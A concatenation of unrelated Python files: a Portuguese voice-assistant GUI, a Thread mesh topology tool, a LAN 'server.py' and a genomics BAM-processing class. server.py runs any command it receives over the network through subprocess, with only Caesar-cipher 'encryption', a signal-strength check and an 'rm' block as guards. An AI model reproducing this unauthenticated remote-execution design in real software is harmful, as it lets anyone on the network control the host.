botaoc = Button(self.janelac, text="OK", command=self.pegar_valor)
botaoc.grid(column=0, row=3, padx=60, pady=10)
self.janelac.geometry("270x200")
self.janelac.resizable(0, 0)
self.janelac.mainloop()
def parar(self):
self.engine_fala('Beleza')
self.engine_fala('estou aqui te esperando')
self.engine_fala('se precisar de algo, só dizer para voltar')
while True:
voz = self.pegar_comandos_separados()
if "está" in voz or "aí" in voz:
self.notificar("Estou aqui sim, esperando você chamar, para chamar basta dizer 'voltar' ou "
"'retornar'")
elif 'voltar' in voz:
self.engine_fala('Ok')
self.engine_fala('Voltando')
self.engine_fala('Não me deixe sozinha por muito tempo')
self.engine_fala('vamos fazer alguma coisa logo')
self.run()
elif 'retornar' in voz:
self.engine_fala('Ok')
self.engine_fala('Retornando')
self.engine_fala('Ficar em silencio é chato')
self.engine_fala('Me fale algo para fazer')
self.run()
class tela(threading.Thread, Label):
def __init__(self, nome, master):
threading.Thread.__init__(self)
self.nome = nome
self.master_tela = master
self.texto_resposta = Label(self.master_tela, font=('Arial', 12), fg='Black', bg='white', height=1, width=20)
self.texto_resposta.grid(column=0, row=1, padx=20, pady=20)
self.texto_cpu = Label(self.master_tela, font=('Arial', 12), fg='black', bg='white', height=1, width=5)
self.texto_cpu.grid(column=1, row=2, padx=190, pady=190)
def run(self):
self.atualizar()
self.atualizar_cpu()
def atualizar(self):
dataatual = datetime.now().strftime(f'%d/%m/%Y - %H:%M:%S Hrs')
self.texto_resposta['text'] = dataatual
# threading.Thread(target=self.atualizar).start()
self.master_tela.after(1, self.atualizar)
def atualizar_cpu(self):
porcentagem = str(cpu_percent())
self.texto_cpu['text'] = porcentagem + "%"
# threading.Thread(target=self.atualizar_cpu).start()
self.master_tela.after(1000, self.atualizar_cpu)
@staticmethod
def fechar():
pyautogui.PAUSE = 1.5
try:
locate = pyautogui.locateOnScreen('x.png', grayscale=True)
locationCenter = pyautogui.center(locate)
except TypeError:
locate = pyautogui.locateOnScreen('x2.PNG', grayscale=True)
locationCenter = pyautogui.center(locate)
pyautogui.click(locationCenter)
@staticmethod
def fechamento_total():
if virtual_assistente.is_run:
pass
else:
janela.destroy()
exit(0)
def tela_aviso(texto):
janelac = Toplevel()
janelac.title(f"Aviso")
image_w = PhotoImage(file="warning.png")
imagem_label = Label(janelac, image=image_w)
imagem_label.place(x=0, y=0, relwidth=1, relheight=1)
textoc = Label(janelac, text=f"{texto:-^60}".upper())
textoc.place(x=200, y=50, anchor="center")
janelac.geometry("400x400")
janelac.resizable(0, 0)
janelac.mainloop()
# validating required files
dependencias = ["model", "Nome.PNG", "Iron-Man-Jarvis.png", "Python.ico", "x.png", "x2.PNG", "databaseC.txt",
"databaseF.txt", "databaseR.txt", "chromedriver.exe"]
for dependencia in dependencias:
if not exists(dependencia):
tela_aviso("Alguma dependência não foi satisfeita")
exit(-1)
model_dependences = ['disambig_tid.int', 'final.mdl', 'Gr.fst', 'HCLr.fst',
'ivector', 'mfcc.conf', 'phones.txt', 'README', 'word_boundary.int']
for model_dependence in model_dependences:
if not exists(f"model/{model_dependence}"):
tela_aviso("Alguma dependência não foi satisfeita")
exit(-1)
ivectors = ['final.dubm', 'final.ie', 'final.mat', 'global_cmvn.stats', 'online_cmvn.conf', 'splice.conf']
for ivector in ivectors:
if not exists(f"model/ivector/{ivector}"):
tela_aviso("Alguma dependência não foi satisfeita")
exit(-1)
# main assistant instance
virtual_assistente = ROXXANE()
if not exists(rf"rede_neural.xml"):
virtual_assistente.notificar("rede_neural.xml não encontrado, recriando...")
virtual_assistente.criar_dataset()
virtual_assistente.treinar_rede()
virtual_assistente.notificar("Pronto, por favor me reinicie")
exit(-1)
# creating the main window
janela = Tk()
janela.iconbitmap("Python.ico")
background_image = PhotoImage(file="Nome.PNG")
background_label = Label(janela, image=background_image)
background_label.place(x=0, y=0, relwidth=1, relheight=1)
if exists(rf"rede_neural.xml"):
with open('rede_neural.xml', 'rb') as f:
virtual_assistente.netWork = load(f)
virtual_assistente.construir_vocabulario(virtual_assistente.frases)
janela.title(f"{virtual_assistente.nome_assistente}")
janela_aparecer = tela(virtual_assistente.nome_assistente, janela)
janela.protocol("WM_DELETE_WINDOW", janela_aparecer.fechamento_total)
janela.geometry('500x300')
janela_aparecer.start()
virtual_assistente.start()
janela.resizable(0, 0)
janela.mainloop()
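# The assistant maps a spoken sentence to a command code with a small PyBrain network:
# criar_dataset() builds a SupervisedDataSet of bag-of-words vectors, treinar_rede() fits it
# with BackpropTrainer, and retornar_valor_previsto() rounds net.activate() to a code. A
# minimal sketch of that train/predict round trip with a toy two-word vocabulary
# (illustrative only; the real vocabulary and codes come from databaseC.txt):
#
#   from pybrain.tools.shortcuts import buildNetwork
#   from pybrain.datasets.supervised import SupervisedDataSet
#   from pybrain.supervised.trainers.backprop import BackpropTrainer
#   ds = SupervisedDataSet(2, 1)
#   ds.addSample([1, 0], [3])   # e.g. "pesquisar ..." -> code 3
#   ds.addSample([0, 1], [4])   # e.g. "email ..."     -> code 4
#   net = buildNetwork(2, 5, 5, 1, bias=True)
#   trainer = BackpropTrainer(net, ds)
#   for _ in range(500):
#       trainer.train()
#   print(round(float(net.activate([1, 0])[0])))   # approaches 3 after training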
|
topology.py
|
import logging
from threading import Thread
import kibra.database as db
from kitools import kiserial
PRATE = 5
TIMEOUT = 240
def _get_devices(br_serial):
logging.info('Looking for devices...')
ncps = []
brouter = kiserial.find_devices(has_br=True, has_snum=br_serial)[0]
brouter = kiserial.KiSerial(brouter.port, debug=kiserial.KiDebug(1))
devices = kiserial.find_devices()
for dev in devices:
if dev.snum not in br_serial:
ncps.append(kiserial.KiSerial(dev.port, debug=kiserial.KiDebug(1)))
logging.info('%d devices found' % len(ncps))
return brouter, ncps
def _str2bin(s):
return str(s) if s <= 1 else _str2bin(s >> 1) + str(s & 1)
def _get_atimestamp(auth=False):
from time import time
epoch = time()
seconds = _str2bin(int(epoch)).zfill(48)
ticks = _str2bin(int((epoch - int(epoch)) * 32768)).zfill(15)
U = '1' if auth else '0'
iATS = int(seconds + ticks + U, 2)
return '0x' + hex(iATS).rstrip('L').replace('0x', '').zfill(16)
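# _get_atimestamp() packs a Thread Active Timestamp: 48 bits of whole seconds, 15 bits of
# 1/32768 s ticks and a 1-bit authoritative flag (U), rendered as 16 hex digits. Worked
# example with a fixed epoch value (illustrative only):
#
#   epoch = 1600000000.5
#   seconds = _str2bin(int(epoch)).zfill(48)                       # 48-bit seconds field
#   ticks = _str2bin(int((epoch - int(epoch)) * 32768)).zfill(15)  # 0.5 s -> 16384 ticks
#   value = int(seconds + ticks + '0', 2)                          # U = 0, not authoritative
#   print('0x' + hex(value).replace('0x', '').zfill(16))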
def _get_oobcom(brouter):
try:
if brouter.ksh_cmd('show status')[0] != 'joined':
return None
except Exception:
print('%s is busy' % brouter.port.port)
return None
oobcom = {}
settings = brouter.ksh_cmd('show netconfig')
for line in settings:
if '| Channel' in line:
oobcom['channel'] = line.split(':')[-1].strip()
elif '| PAN ID' in line:
oobcom['panid'] = line.split(':')[-1].strip()
elif '| Extended PAN ID' in line:
oobcom['xpanid'] = ''.join(line.split()[5:9])
elif '| Network Name' in line:
oobcom['netname'] = '"%s"' % line.split(':')[1].strip()
elif '| Mesh-Local ULA' in line:
oobcom['mlprefix'] = line.split(' : ')[-1].split('/')[0]
elif '| Active Timestamp' in line:
oobcom['actstamp'] = line.split(':')[-1].strip()
elif '| Master Key' in line:
oobcom['mkey'] = line.split(':')[-1].strip()
oobcom['commcred'] = '"%s"' % db.get('ncp_commcred')
return oobcom
def _join_network(dev, role, oobcom):
logging.info('Adding %s to the network as %s' % (dev.name, role))
if dev.ksh_cmd('show status', True)[0] != 'none':
dev.ksh_cmd('debug level none', True)
dev.ksh_cmd('clear')
dev.wait_for('status', ['none'], 5)
dev.ksh_cmd('config outband')
# dev.ksh_cmd('config thver 3')
for key, param in oobcom.items():
dev.ksh_cmd('config %s %s' % (key, param))
if role == 'sed':
dev.ksh_cmd('config pollrate %u' % PRATE)
if role == 'leader' or role == 'reed':
dev.ksh_cmd('config sjitter 1')
dev.ksh_cmd('config role %s' % role)
dev.ksh_cmd('ifup')
dev.wait_for('status', ['joined'], 60)
dev.wait_for('role', [role, 'leader'], 120)
def _stop_topology(dev):
logging.info('Removing %s from the network' % dev.name)
dev.ksh_cmd('clear')
dev.wait_for('status', ['none'], 5)
def form_topology():
db.load()
brouter, ncps = _get_devices(db.get('ncp_serial'))
threads = []
oobcom = _get_oobcom(brouter)
if oobcom:
oobcom['timeout'] = TIMEOUT
for device in ncps:
mac = device.ksh_cmd('show eui64', True)[0]
device.set_mac(mac)
# oobcom['actstamp'] = _get_atimestamp()
threads.append(Thread(target=_join_network, args=[device, 'fed', oobcom]))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def clear_topology():
db.load()
_, ncps = _get_devices(db.get('ncp_serial'))
threads = []
for device in ncps:
threads.append(Thread(target=_stop_topology, args=[device]))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
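# Hypothetical usage of this module (not part of the original file): form the test topology
# around the border router recorded in the kibra database, run whatever needs the mesh, then
# tear it down again.
#
#   if __name__ == '__main__':
#       logging.basicConfig(level=logging.INFO)
#       form_topology()
#       # ... exercise the network ...
#       clear_topology()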
|
server.py
|
#!/usr/bin/env python3
import socket
import re
import threading
import time
import select
import subprocess
from _thread import *
print("#################")
print("Welcome to SERVER")
print("#################")
start = time.time()
end = 20
old_packet = ""
start_time = 0
name = "Server"
RSSI = 0
Online_Users = []
def encrypt(text, s):
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
if (char.isupper()):
result += chr((ord(char) + s - 65) % 26 + 65)
elif (char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif (char == '\n'):
result += chr(1500)
elif (char == '.'):
result += chr(2000)
elif (char == '-'):
result += chr(2001)
elif (char == '/'):
result += chr(2002)
else:
result+= chr(3000)
return result
def decrypt(text, s):
s = 26 - s
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
if (char.isupper()):
result += chr((ord(char) + s - 65) % 26 + 65)
elif (char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif (char == chr(1500)):
result += "\n"
elif (char == chr(2000)):
result += "."
elif (char == chr(2001)):
result += "-"
elif (char == chr(2002)):
result += "/"
else:
result += " "
return result
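# encrypt()/decrypt() apply a Caesar shift over ASCII letters keyed by the RSSI value, map a
# few punctuation characters to private code points, and collapse everything else to a space
# on decryption. Illustrative round trip with an arbitrary shift (letters, spaces and the
# mapped '.', '-', '/' characters survive unchanged):
#
#   s = 7
#   assert decrypt(encrypt("ls -la", s), s) == "ls -la"
#   assert decrypt(encrypt("Hello.World", s), s) == "Hello.World"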
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#### -----------IP & PORT -------------####
PORT = 12345
Local_IP = get_ip()
search_NET = re.search(r'\b(?:[0-9]{1,3}\.){2}[0-9]{1,3}\b', Local_IP)
Local_NET = search_NET.group()
buffer_size = 1024
#### -------------------------------- ####
def send_packet(HOST, packet):
global PORT, Online_Users
packet = packet.encode('utf-8', 'replace')
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
s.connect((HOST, PORT))
s.sendall(packet)
except:
print("User is not online any more or invalid IP address")
for user in Online_Users:
if user[1] == HOST:
Online_Users.remove(user)
def listen_TCP_packets():
global PORT
global Local_IP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((Local_IP, PORT))
s.listen()
while True:
conn, addr = s.accept()
data = conn.recv(buffer_size)
if not data:
break
string = str(data.decode('utf-8', 'replace'))
receive(string)
conn.close()
def listen_broadcast():
global PORT
global buffer_size
global Local_IP
global old_packet
global start_time, Online_Users
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.bind(('', PORT))
s.setblocking(0)
while True:
result = select.select([s], [], [])
if not result:
break
message = result[0][0].recv(buffer_size)
if not message:
break
string = str(message.decode('utf-8', 'replace'))
end_time = time.time()
elapsed_time = end_time - start_time
elapsed_time = float(format(elapsed_time, 'f'))
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = string.split(",")[2].strip()
if Local_IP != IP and (old_packet != string or elapsed_time > 5):
# if (old_packet != string or elapsed_time > 5) :
if [username, IP] not in Online_Users:
Online_Users.append([username, IP])
packet = "[" + name + ", " + Local_IP + ", " + "response" + "]"
# packet_type = announce , response back with unicast TCP
start_new_thread(send_packet, (IP, packet))
old_packet = string
start_time = end_time
def receive(string):
global RSSI
global start, end, Online_Users
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = ""
message = ""
end = time.time()
elapsed_time = end - start
if "message" in string:
rssi = int(string.split(",")[4].strip())
print("Elapsed: ", elapsed_time)
if elapsed_time < 5:
sendmessage(IP, encrypt("You need to wait five seconds before sending another command.", rssi))
else:
packet_type = string.split(",")[2].strip()
message = string.split(",")[3].strip()
# decryption
message = decrypt(message, rssi)
if "rm" == message[:2]:
sendmessage(IP, encrypt("You can not execute remove commands.", rssi))
else:
if RSSI == 0:
RSSI = rssi
print(RSSI, rssi)
diff = abs(rssi - RSSI)
if diff > 10:
pass
else:
print("New command: " + message)
command = message.split(" ")
output = ""
try:
output = subprocess.check_output(command).decode("utf-8")
except Exception as e:
output = str(e)
output = encrypt(output, rssi)
sendmessage(IP, output)
# response packet
else:
packet_type = string.split(",")[2].strip()
if [username, IP] not in Online_Users:
Online_Users.append([username, IP])
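# Packets are plain UTF-8 strings: "[username, IP, type]" for announce/response traffic and
# "[username, IP, message, <payload>, <rssi>]" for commands, which receive() splits on
# commas. Illustrative examples of the two shapes (all values made up):
#
#   announce = "[Server, 192.168.1.10, announce]"
#   command = "[client1, 192.168.1.23, message, " + encrypt("ls -la", 7) + ", 7]"
#   # receive(command) decrypts the payload with the RSSI value and executes it.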
def broadcast(sock, packet):
global PORT
sock.sendto(packet, ('<broadcast>', PORT))
def announce():
global PORT
global Local_IP
global name
packet = "[" + name + ", " + Local_IP + ", " + "announce" + "]"
packet = packet.encode('utf-8', 'replace')
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
count = 0
# Send 3 broadcast packets
while count < 3:
start_new_thread(broadcast, (sock, packet))
# sock.sendto(packet , ( '<broadcast>', PORT))
# sleep 0.25 seconds between packets
count = count + 1
time.sleep(0.25)
sock.close()
time.sleep(10)
def sendmessage(ip, text):
global Local_IP
global name, start
message = text
packet = "[" + name + ", " + Local_IP + ", " + "message" + ", " + message + "]"
start_new_thread(send_packet, (ip, packet))
start = time.time()
def quit_server():
subprocess.call(["pkill", "-f", "server.py"])
announce_thread = threading.Thread(target=announce, args=())
announce_thread.daemon = True
announce_thread.start()
listen_thread = threading.Thread(target=listen_broadcast, args=())
listen_thread.daemon = True
listen_thread.start()
listen_packets_thread = threading.Thread(target=listen_TCP_packets, args=())
listen_packets_thread.daemon = True
listen_packets_thread.start()
while True:
answer = input("Write Q to shut down server : ")
if answer == "Q":
quit_server()
else:
continue
|
bam.py
|
#!/usr/bin/env python
# coding=utf-8
"""Module Description
Copyright (c) 2017 Jianfeng Li <lee_jianfeng@sjtu.edu.cn>
This code is free software; you can redistribute it and/or modify it
under the terms of the MIT License.
@bam: Bam File Class
@status: experimental
@version: 0.1.0
@author: Jianfeng Li
@contact: lee_jianfeng@sjtu.edu.cn
"""
from utils import *
from reffa import ReffaFile
from vcf import VcfFile
from mpileup import MpileupFile
class BamFile(FundementalFile):
"""
Description:
Class Name: BAM File; initialize with the BAM file path and the sample name (e.g. A101A, A101C or A101T).
Method:
Fundemental Function:
index:Use samtools index on the *.bam file to generate *.bam.bai
mpileup:Use samtools mpileup on the *.bam file to generate a mpileup file
Preprocesss Function:
contig_reorder:Use picard to reorder the BAM file according to the reference file.
add_read_group:Use picard to add Read Groups,RGID,RGLB,RGPL,RGPU,RGSM in BAM file header.
mark_duplicates:Use picard to mark duplicates in the BAM file.
realigner_target_creator:Use GATK to run RealignerTargetCreator
indel_realigner:Use GATK to run IndelRealigner
recalibration:Use GATK to run BaseRecalibrator
print_reads:Use GATK to run PrintReads
split_ntrim:Use GATK to split_ntrim and conduct ReassignOneMappingQuality.
Variant Caller:
haplotype_caller:Use GATK haplotype_caller to conduct Variant Discovery Step.
unifiedgenotyper_caller:Use GATK unifiedgenotyper_caller to conduct Variant Discovery Step.
mutect_caller:Use Mutect1 to conduct Variant Discovery Step.
varscan_caller:Use Varscan2 to conduct Variant Discovery Step.
torrent_caller:Use TVC to conduct Variant Discovery Step.
lofreq_caller:Use LoFreq to conduct Variant Discovery Step.
pindel_caller:Use Pindel to conduct Variant Discovery Step.
"""
def __init__(self, path, samplename, config_dict = "", runid = None):
if runid is None:
runid = samplename
FundementalFile.__init__(self, path, config_dict, runid)
self.samplename = samplename
################################################# Fundemental Function ################################################
def index(self):
"""
        Ret:Use samtools index to index the *.bam file and generate *.bam.bai
"""
config_dict = self.config_dict
samtools = config_dict["samtools"]
thread = config_dict["bamfile_index_thread"]
extra_option = config_dict["bamfile_index_extra"]
cmd = "%s index -@ %s %s %s" % (samtools, thread, extra_option, self.path)
if not isexist(self.path + ".bai") and not isexist(self.path[0:-3]+"bai"):
info("Running the samtools index step for " + self.path)
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
savecmd(cmd, self.samplename)
if isexist(self.path[0:-3]+"bai"):
return(self.path[0:-3]+"bai")
elif isexist(self.path + ".bai"):
return(self.path + ".bai")
else:
return(False)
def sort(self, out_bam):
"""
        Ret:Use samtools sort to sort the *.bam file and generate a sorted *.bam file
"""
config_dict = self.config_dict
samtools = config_dict["samtools"]
thread = config_dict["bamfile_sort_thread"]
extra_option = config_dict["bamfile_sort_extra"]
info("Running the samtools sort step for " + self.path)
cmd = "%s sort %s -@ %s -o %s %s" % (samtools, extra_option, thread, out_bam, self.path)
if not isexist(out_bam):
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
savecmd(cmd, self.samplename)
if isexist(out_bam):
return(BamFile(out_bam, self.samplename, config_dict))
else:
return(False)
def mpileup(self, out_fn):
"""
        Ret:Use samtools mpileup on the *.bam file and generate *.bam.mpileup
"""
config_dict = self.config_dict
samtools = config_dict["samtools"]
reffa = config_dict["reffa"]
intervals = config_dict["intervals"]
extra_option = config_dict["bamfile_mpileup_extra"]
info("Running the samtools mpileup step for " + self.path)
out_fn = MpileupFile(out_fn, self.samplename, config_dict)
if isexist(intervals):
cmd = "%s mpileup %s -l %s -f %s %s > %s" % (samtools, extra_option, intervals, reffa, self.path, out_fn.path)
else:
cmd = "%s mpileup %s -f %s %s > %s" % (samtools, extra_option, reffa, self.path, out_fn.path)
if out_fn.isexist():
savecmd(cmd, self.samplename)
elif not self.isexist():
info("%s BAM file is not exists!" %(self.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd ,self.samplename)
if not out_fn.isexist():
return(False)
return(out_fn)
def __str__(self):
return(self.path)
    ################################################# Preprocess Function #########################################################
def contig_reorder(self, out_bam):
"""
        Ret:Use picard to reorder the BAM file according to the reference file. (Both DNA and RNA)
"""
config_dict = self.config_dict
reffa = config_dict["reffa"]
java = config_dict["java"]
picard = config_dict["picard"]
extra_option = config_dict["bamfile_contig_reorder_extra"]
info("Running the contig reorder by picard for %s!" % self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam, self.samplename, config_dict)
cmd = "%s -jar %s ReorderSam I=%s O=%s REFERENCE=%s %s" %(java, picard, in_bam.path, out_bam.path, reffa, extra_option)
log = " &> %s/log/%s.contig_reorder.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd ,self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd ,self.samplename)
if not out_bam.isexist():
return(False)
out_bam.index()
return(out_bam) # BamFile Class instance
def add_read_group(self, out_bam, RGID = 1, RGLB = "Jhuanglab", RGPL="ILLUMINA", RGPU = "Hiseq", use_config_file = True):
"""
        Ret:Use picard to add Read Groups (RGID, RGLB, RGPL, RGPU, RGSM) to the BAM file header. (Both DNA and RNA)
"""
config_dict = self.config_dict
reffa = config_dict["reffa"]
java = config_dict["java"]
picard = config_dict["picard"]
extra_option = config_dict["bamfile_add_read_group_extra"]
java_max_mem = config_dict["java_max_mem"]
if use_config_file:
RGID = config_dict["bamfile_RGID"]
RGLB = config_dict["bamfile_RGLB"]
RGPL = config_dict["bamfile_RGPL"]
RGPU = config_dict["bamfile_RGPU"]
info("Running add_read_group step for " + self.path)
RGSM = self.samplename
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam, self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s AddOrReplaceReadGroups \
I=%s \
O=%s \
RGID=%s \
RGLB=%s \
RGPL=%s \
RGPU=%s \
RGSM=%s %s" %(java, java_max_mem, picard, self.path, out_bam, RGID, RGLB, RGPL, RGPU, RGSM, extra_option)
log = " &> %s/log/%s.add_read_group.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
out_bam.index()
return(out_bam) # BamFile Class instance
def mark_duplicates(self, out_bam, metrics):
"""
        Ret:Use picard to Mark Duplicates of the BAM file.
"""
config_dict = self.config_dict
java = config_dict["java"]
picard = config_dict["picard"]
extra_option = config_dict["bamfile_mark_duplicates_extra"]
java_max_mem = config_dict["java_max_mem"]
info("Running mark_duplicates step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s MarkDuplicates %s I=%s O=%s CREATE_INDEX=true VALIDATION_STRINGENCY=SILENT M=%s" %(java, java_max_mem, picard, extra_option, self.path, out_bam, metrics)
log = " &> %s/log/%s.mark_duplicates.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam) # BamFile Class instance
def realigner_target_creator(self, out_interval):
"""
        Ret:Use GATK RealignerTargetCreator on the BAM file (DNA-seq use).
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
java_max_mem = config_dict["java_max_mem"]
thread = config_dict["bamfile_realigner_target_creator_thread"]
extra_option = config_dict["bamfile_realigner_target_creator_extra"]
info("Running realigner_target_creator step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_interval_obj = FundementalFile(out_interval, config_dict, self.samplename)#output is out_interval
cmd = "%s -Xmx%s -jar %s -T RealignerTargetCreator -R %s --num_threads %s \
-allowPotentiallyMisencodedQuals -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, thread, self.path, out_interval, extra_option)
log = " &> %s/log/%s.realigner_target_creator.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_interval_obj.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_interval_obj.isexist():
return(False)
        return(out_interval) # path of the generated target intervals file
def indel_realigner(self, intervals, out_bam):
"""
        Ret:Use GATK IndelRealigner on the BAM file (DNA-seq use).
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
java_max_mem = config_dict["java_max_mem"]
extra_option = config_dict["bamfile_indel_realigner_extra"]
info("Running indel_realigner step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s -T IndelRealigner -R %s -targetIntervals %s \
-allowPotentiallyMisencodedQuals -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, intervals, self.path, out_bam, extra_option)
log = " &> %s/log/%s.indel_realigner.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam) # BamFile Class instance
def recalibration(self, out_grp):
"""
        Ret:Use GATK BaseRecalibrator on the BAM file (DNA-seq use).
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
extra_option = config_dict["bamfile_recalibration_extra"]
java_max_mem = config_dict["java_max_mem"]
known_sites_vcf = config_dict["known_sites_vcf"]
known_sites_vcf = known_sites_vcf.split(":")
info("Running recalibration step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_grp_obj = FundementalFile(out_grp, config_dict, self.samplename)
cmd = "%s -Xmx%s -jar %s -T BaseRecalibrator -R %s \
--unsafe -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, self.path, out_grp_obj.path, extra_option)
for j in known_sites_vcf:
cmd = cmd + " -knownSites " + j
log = " &> %s/log/%s.recalibration.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_grp_obj.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_grp_obj.isexist():
return(False)
return(out_grp)
def print_reads(self, grp, out_bam):
"""
Ret:Use GATK to print DNAseq bam data.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
java_max_mem = config_dict["java_max_mem"]
extra_option = config_dict["bamfile_print_reads_extra"]
info("Running print_reads step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s -T PrintReads -R %s \
-BQSR %s -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, grp, self.path, out_bam, extra_option)
log = " &> %s/log/%s.print_reads.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam)
#split_ntrim: RNA seq bam use
def split_ntrim(self, out_bam):
"""
Ret:Use GATK to split_ntrim and conduct ReassignOneMappingQuality for RNAseq bam data.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
extra_option = config_dict["bamfile_split_ntrim_extra"]
java_max_mem = config_dict["java_max_mem"]
info("Running splitNtrim step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s -T SplitNCigarReads \
-R %s \
-I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, in_bam, out_bam, extra_option)
log = " &> %s/log/%s.split_ntrim.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam) # BamFile Class instance
###################################################### Variant Caller ###############################################
def haplotype_caller(self, out_dir, control_bam = "", seq_type="dna"):
"""
Ret:Use GATK HaplotypeCaller to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
intervals = config_dict["intervals"]
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
tmp_dir = config_dict["gatk_tmp_dir"]
extra_option_rna = config_dict["bamfile_haplotype_caller_extra_rna"]
extra_option_dna = config_dict["bamfile_haplotype_caller_extra_dna"]
java_max_mem = config_dict["java_max_mem"]
info("Running Haplotype_caller step for " + self.path)
snp_flag = dbsnp != ""
intervals_flag = intervals != ""
create_dir(out_dir)
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf,self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
if seq_type == "dna":
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -I %s -o %s "\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_dna, self.path, control_bam, out_vcf.path)
else:
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -I %s -o %s "\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_rna, self.path, control_bam, out_vcf.path)
else:
if seq_type == "dna":
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -o %s"\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_dna, self.path, out_vcf.path)
else:
